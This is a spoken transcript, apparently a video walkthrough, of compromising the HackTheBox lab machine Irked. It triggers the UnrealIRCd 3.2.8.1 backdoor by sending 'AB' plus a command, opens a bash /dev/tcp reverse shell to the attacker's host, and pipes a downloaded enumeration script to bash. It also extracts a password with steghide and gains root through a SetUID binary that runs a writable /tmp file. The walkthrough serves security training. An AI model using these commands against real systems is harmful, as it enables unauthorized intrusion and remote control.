What's going on YouTube? This is Ipsec, and we're going to be doing Irked from HackTheBox, which was a easy box, and the first step involves finding a backdoored IRC server. This happened back in, I think, 2009. Most people probably just ran the Metasploit module after discovering it, but we'll manually enumerate IRC, discover the version it is, and then read about the backdoor and exploit it manually. Once you get a low priv shell in the box, there is a hint on the box that points you towards steganography. You do that and you get a low priv password, you SSH in, and then there is a SetUID executable that is relatively easy to exploit. So with all that being said, let's just jump in. Like every other box, we start off with the nmap, so -sc for default scripts, sv, enumerate versions, OA, output all formats, put in the nmap directory and call it Irked, and then the IP address, which is 10.10.10.117. It does take some time to run, so I've already ran it. Looking at the results, we have just 3 ports open. SSH on port 22, and it's running Debian. HTTP on port 80, and it's running Apache HTTPD. And then we have RPC bind on port 111, and we don't have really any information about this. I'm not 100% familiar with this service. I know if NFS is running, Network File System, we exploited that back on the jail video. We'd see another port open as well, like port, I think, 2049. But let's go over and check out what is listening on HTTP. So going to 10.10.10.117, and we just get an image, and it says IRC is almost working. So I'm going to do a full nmap because we have this RPC thing listening, which normally I see other ports. And then the website also says a hint about IRC. So let's do nmap-p 10.10.10.117. And whenever I do -p-, I like doing -vvv, just making it verbose, and that says when it discovers an open port. So I'm going to go back to the web page while that runs. Let's check robots.txt. Doesn't exist. We can try like squiggly root. And if Apache's set up to do home directories, you'd get this resolved. It's not something I see very often. It's an old thing. So let's just run GoBuster. So GoBuster-u, HTTP 10.10.10.117 -w for word list. It's user share GoBuster directory list, GoBuster word list. Directory list to 3 medium.txt, and then we'll do -o for out file, and we'll just call this root.log and let this run. So while that goes, let's just see if we can find any other information about this. So we can do /index.html, and we get this page, and I'm doing this because this kind of identifies what the web server is. When you don't put anything, then it's up to how the web server is configured to determine what the page is. And a lot of Linux hosts, it'll automatically add like index.html, index.php, and other things. So trying index.php, we don't get anything. We could try index.aspx, and we could also try like default.aspx, which are defaults in Windows, which probably wouldn't happen because, well, again, this says it is a Debian host. So going back, do we have anything else? It doesn't look like we have anything yet. There is a /manual, so let's go check what that is. So if we go to /manual, we just get the default Apache documentation, so nothing too interesting there. The copyright is 2014, which may indicate this is old, but I guess we will just keep on waiting. And right when I come back, we do see port 8067 is open, so let's go check what that is. I'm going to open up a new pane, and then we'll just do nmap-sc-sv -p8067 10.10.10.117 and see if nmap comes back with anything. While that happens, I'm going to manually look at this with netcat. So we'll do ncat 10.10.10.117, and all we see is nmap says the port's open, and it is IRC with UnrealIRCd. So if we go to port 8067, we do see irked.htb, notice auth, looking up your host name. So the very first thing I do is let's edit our host file and put that host name there. So that's vi etc host, and then we do 10.10.10.117 irked.htb. Save that, go to Firefox, irked.htb to see if there's any virtual host routing. Doesn't look like it. So we continue on and poking at this IRC server. I want to see what the banner information is for this. So I'm going to do netcat 10.10.10.117.8067, and we have to first look up how to talk IRC. So I'm just going to Google RFC IRC and pull up RFC 1459. This one may also work. I don't know what the difference between those two is. 93 versus 2000. We'll just do the first one. Probably should read both of them, but this will tell us exactly how to do connections. So we have connection registration, and we see we send it the password message, the nick message, and then the user message. So first comes pass and then a password, then nick and a nickname. And if we want, we can put a hop count. This means optional. And then we have a user message with username, host name, server name, realm name. And host name and server name aren't trusted by the server. I think it says that somewhere if we search host name to highlight this. Note that host name and server name are normally ignored by IRC for reasons, but you have to put them. So let's do this. So we'll do netcat, that port 8067. We'll do password of IPsec, user of IPsec, and then, actually, I screwed that up. Pass IPsec, nick IPsec, and now we have to do the user command. So that was user, a host name, a server name, and a realm name. So we'll do user IPsec. The host name will be please subscribe, and we'll call the server and comment, and then the realm name. And if you look at the RFC, you need a colon. The realm name, we'll just call this IPsec. And now we get the IRC server talking back to us, and we can see, welcome to Roxnet IRC server IPsec. IPsec, here's the password. Your host is irked.htb, running version Unreal 3.2.8.1. And we see the server was created Monday, May 14th, 2018. And if we go to Google, we can probably just Google Unreal IRC and look at when this was released. So Unreal IRC changelog, put the version in, and right away we get a bunch of proof of concepts when we were just looking for a release date. So if we go back to our box, I'm going to open a new pane and do search exploit IRC, we'll do Unreal, and we can see UnrealIRCd backdoor command execution and Metasploit. So if you Google around for probably UnrealIRC backdoor, let's see, there should be a page that describes this. And we can see around November 10th, 2019, a backdoored version got pushed up to some repository, and then it got pushed into the Gentoo build. The backdoor is disguised to look like a debug code statement. As we can see, this is what the backdoor was. And it looks like it's just doing something and then printing a debug log. But debug mode 3_info was defined to AB, and then debug log was defined to system. So what this is doing is saying, hey, if the buffer begins with AB, pass it over to system and execute the buffer. So we could go and do it through Metasploit, but we already have enough information. So let us just open a new pane, do tcp dump -i ton 0 ICMP, and then let's do ping-c1 127.0.0.1. That is the correct syntax. I always get -c and -n mixed up between Linux and Windows. So let's do echo AB, and then we'll do ping 1010 14. I think I'm 2. If config ton 0, I am 3. And we have to put -c 1, and then pipe that to netcat 10.10.10.117, and the port, I think it was 8067. Let's go back to the previous pane. It is 8067. Hit enter, and let's see if it actually works. Do we have to enter a host name and everything? Nope. After that times out, we do get a reply saying Irked initiated a ICMP request to us. My box's hostname is HTB, so that's why we saw that. Normally I add -n to not do this DNS resolution, but in this case, it's easy enough to see that we do have command execution. So let us get a reverse shell. We'll do netcat lvnp port. I wanted to do something fancy, but we'll just do 9001. And then up here, let's send us a shell. So bash-i, that, whatever that's called, dev tcp 10.10.14.3. We'll do port 9001, and then close it all off. And that looks fine. And give this time to time out. We can put the nick here just in case it wants it, but I know it doesn't. We just have to wait for the hostname lookup to time out. And we didn't get a shell. Let's try putting this within bash-c. So we'll do bash-c, just in case system is linked to bensh or dash or something that doesn't have this feature. And that looks like the case. So there are multiple shells on Linux. You got a stripped down one, then you got bash, you got zsh, you got a bunch of them. So this is a bash thing. So that's why I made sure I was in a bash shell before I executed that command. So let us now upgrade a shell to a proper TTY. So python-c import pty pty.spawn bin bash. And then we'll background this with Control-Z, hit F, then stty, raw minus echo, then hit FG, enter, and then hit enter again, and now we're at a shell. And I'm just going to do export term is equal to xterm, so now I can clear the screen, and we can begin enumerating this box. So the first thing I'm going to do, look at my directory, home IRCD, Unreal. So let's do lsla. And we don't really have anything. We do have a bash history file, so let's look at this. And we just have stuff and keys. Got a user djmardov. So let's go into home, djmardov. And we could also look at uname-a to see when this kernel was compiled. 2018-0508, which is probably around the time this box was released, so I'm guessing a kernel prevesc isn't intended. So let's look in this home directory, find .-ls. We get permission denied in places. Let's do -type F to only show files. And that doesn't look like it only showed files. I thought that would, but we have documents, and then user.txt, which we can't read because we are not this user. We can see this guy has read, write, execute, just read, write to it. Then the group and everyone else doesn't have anything, so we can't read user.txt. But we can go into this backup directory, which isn't a directory, that is a file. So let's cat that, and we see Super Elite Steg Backup PW. Up, up, down, down, left, right, BA, BA, SS, SS. That's probably select start. And that I think is I think it was Contra for the unlimited life, or it's called the Konami code, I believe, but I digress. Let us just go and think of what steg could be. There's only been one image this whole box, and that was on the home page. So I am going to download this. So let's copy this URL and then go back up here, and I just Control-C my shell probably. Nope, it backgrounded it, sweet. So we can do curl that URL -o irked.jpg, and that gave us a password to do. So let's copy this and try steg hide. So steg hide, do I have it on my box? I don't even have it on my box. Apt install steg hide. And this is just one of the most common steganography used in CTFs. So I always start with steg hide when I do something, especially if it says there's a password. Now that it's installed, we can do steg hide -h --help and see how to do this. So -sf is stego file and -p is passphrase. So we'll do steg hide extract -sf and then irked.jpg -p and the password. Wrote extracted data to pass.txt. So if we look at pass.txt, we have a weird string. I'm just going to try to SSH with it. It's not base 64 because we have this colon. We found it in a home directory, so that's the user I'm going to use. So we'll do SSH djmardov at 10.10.10.117. Yes. And then paste the password, and we get logged in. So now on this box, let us do lsla and see if we have anything obvious to do before we go and run like linenum. So obviously we can go into the desktop, or where is it? There's user.txt somewhere here. Find.grep-i user.txt. The lazy way to do it, and it's in documents. So we can do wc-c user.txt. It's 30 characters, which is just an MD5 sum, so I'm not going to open that. I do see a SSH directory. Nothing is in this directory. If there's any other home users on this box, there isn't. I can't get into root. If we go to var-dub-dub-dub, let's see if HTML is writable by anyone. I know it's not going to be the case for this box, but there was a relatively recent Apache exploit, Carpe Diem, that I love to show, but doesn't look like it's applicable because we can't write into a web directory. There is index.old, so let's look at that. This looks like it's just the default page, so it is going to be time to do a linenum. So looked at all the common things. Let's just kill that pane, start a new one, and I think it's opt linenum. So I'll do python-c or python-m, simple HTTP server, and we can just curl 10.10.14.3 port 8000 linenum.sh, pipe it over to bash. Curl is not here. Let's do wget. We're not in a writable directory, so let's go to one and do wget 10.10.10 or 10.10.14.3 port 8000 linenum.sh, and then we'll execute that. I'm sure there's an elegant way to do that with wget without saving it to a disk, but oh well, I don't care. And looking at the results, let's just go over to the beginning and see if we see anything. And we probably should have checked sudoers, honestly, and groups. So there's a lot of things we forgot to check, but this will luckily check it for us. So who else is logged in? No one. Group memberships. passwd. Root's a super user account. Files owned by us. I don't care about that. Hidden files. I don't really care about that. Home directory stuff. Don't care about that. Let's see, can I just search by this? Let's do... I know there's a way to do that, but oh well. Path information, available shells. So it doesn't look like we've found anything too interesting yet. Intercron, system D timers, networking info, running processes, binaries, permissions associated with those. Software, Apache user, home directory for Apache. Let's see. Do we have anything? Is SUID here? So, SUID files. And two stick out right away. The two that stick out are the ones done in 2018. It's exam4, which I know is a mail server, so it's not that interesting. But user bin viewer, definitely interesting, and that is done on May 16th. So let's go take a look at that. So I just scrolled down because I was curious what I thought was potentially interesting. Where is viewuser? I am not familiar with this binary, so let's see what it is. So if we do lsla on it, we get it's owned by root. It's a SetUID binary, so let's execute it with viewuser. And we get this application is being developed to set and test user permissions, and a file is not found, temp list users. So I'm going to do, I don't have ltrace or strace on it, so let's copy this back to our HackTheBox. So I forget what the password is for this user, I'm lazy. So I'm just going to base 64 it. I'm guessing it's not too big. And I want -W0 to get rid of line wrapping. And let's copy it. It's now in my clipboard. So we can do viewuser.b64, paste, wrong clipboard, paste it, base64-d, viewuser, and send that to the file, chmod +x, and we probably should open it up in IDA or Ghidra, but I don't have those installed, and I'm lazy, so let's just do strace on viewuser, and see if we can get an idea of what it's doing. And this is just going to list all the syscalls, and we can see, let's see what it's doing. Maybe ltrace would be a better one to do. Okay, yeah, ltrace is a bit easier to read. So we have the put statements saying this application is still being developed. Then we get it running system who, and we don't see it using a full path here, so we may have code execution right there. And then we also get SetUID 0, system, and then executing this file. So let us copy this. Let's go back to the box. Edit this file. Let's just put bin bash. And then, is that the correct order? Or is it, no, it's, I can't even remember what the correct order for that is. Pretty sure it's this. And then do bin bash. And chmod +x to make it executable. And now if we execute temp list user, we get a bash shell, which is fine. So let's now do viewuser. And viewuser is going to execute what we just did to get a shell. And to make it a bit more clear, let's just do echo sending a shell. We'll do root shell. So that should make it clear what's happening. So let's do viewuser I hit caps lock. Enter. And now we see it is sending us the root shell, and we're root at Irked. So if we go into /root, we can do wc-c root.txt, and we got pass.txt, which I guess is the same password as the home user. I don't think that's root's password. I'm going to be sad because we did not try that. So let's do su, put the password, not allowed. We can do sudo -l, sudo is not found. And the last thing I want to do was look at if we could also execute this, where is it? Who statement. So it's running system who, and I don't see the full path. It should be user bin who. So let's export path is equal to dev shm, and then path. I think that's correct. Echo path. It is. So now we can do v who, do the same thing, and we'll do echo sending root shell, echo blank line, echo blank line, echo who hijacked. If I could really type, oh my god. And now we can finally just execute bin sh, or we can do bash to keep it what we have been. So chmod +x who, and let's rm temp, what was it, list user. Okay. So now when we run view users, we still get it, and we did not privesc. Oh, because the SetUID calls are after this. So it's not vulnerable because it does who, and then it does the SetUID call to make itself root and does this system call. So that's why when we hijacked it, we didn't get anything. But when we just did it down here, we did. Hopefully that makes sense. It's all because of that SetUID call. So that is the box, and this video went quicker than I imagined. So I guess we can go and do the Ghidra, however you pronounce it, to look at this binary. It should be relatively simple. So let's go to Firefox and just Google download Ghidra. And then we want to do the website, not the GitHub repository, and download this. And we'll see when this finishes. It looks like it's going relatively quick. Now that it's done, let's go to terminal, go to opt, and then we can just unzip what's in downloads, and then we'll rename it to get rid of that version, because I really hate having that version information in my directories. Just a little OCD thing, I guess. So move, and then let's get rid of that, go in, and then run it. Click I agree. And then we should create the project. We don't need this help thing. Hopefully we don't need it. The last time I did this was in the Mimikatz video, I think. One of the Windows videos where we set up Commando VM. So give it a directory name. So that's root HTTP boxes Irked. We'll just call this viewuser re, and that is actually the project name. And then click on this little code browser. And back when I did in Commando, I think that was the first time I've ever used this. So this will probably be the second time I've used this program. First time, it was impressive. So we'll see if it keeps that up. So open project, no. Import file. I think that's what we want. HTB boxes. Irked is down here. And we want view user. Discovered it as an ELF, 32-bit. Has not been analyzed. Let's analyze it and select all. And then click go. So, don't really have anything. Let's go over to functions. Go to main. And we can see the decompiler did a really good job at showing us exactly what it's doing. It's doing a puts. This application is being developed. Then it's running system who, SetUID, system, return 0. So we can look at the assembly code, which is how we have been doing it. And we can see, let's see, it's loading the effective address into EAX, then pushing it, and then calling puts. And then we do, what this does is EAX is used as, I guess, like an argument. So we load the string into EAX, and then we're pushing it to the stack. And because this is a 32-bit binary, these arguments pull from the stack in order. And instead of 64-bit, where they go in order of the registers RDI, then RSI, then RDX, then RCX, then R8, and then finally R9. So 64-bit programs have 6 registers dedicated to arguments, whereas 32 bits just generally push it to the stack. So we see the put statement, which then puts this over to your screen, and now we're loading the next one, which is it is actively being developed, and then does a puts, and then loads who, which is just W right here in comments, but it's loading that, then calling system, and then we do another one to do SetUID, and then we do system after we load to do list users. So the decompiler worked pretty darn well. And if you wanted to get the call graph, I think that button is right here. This may be more used to what you're seeing. If the other format, if that intimidates you, sometimes this is easier to read. But that's the box. Hope you guys enjoyed it. Take care, and I'll see you all next week.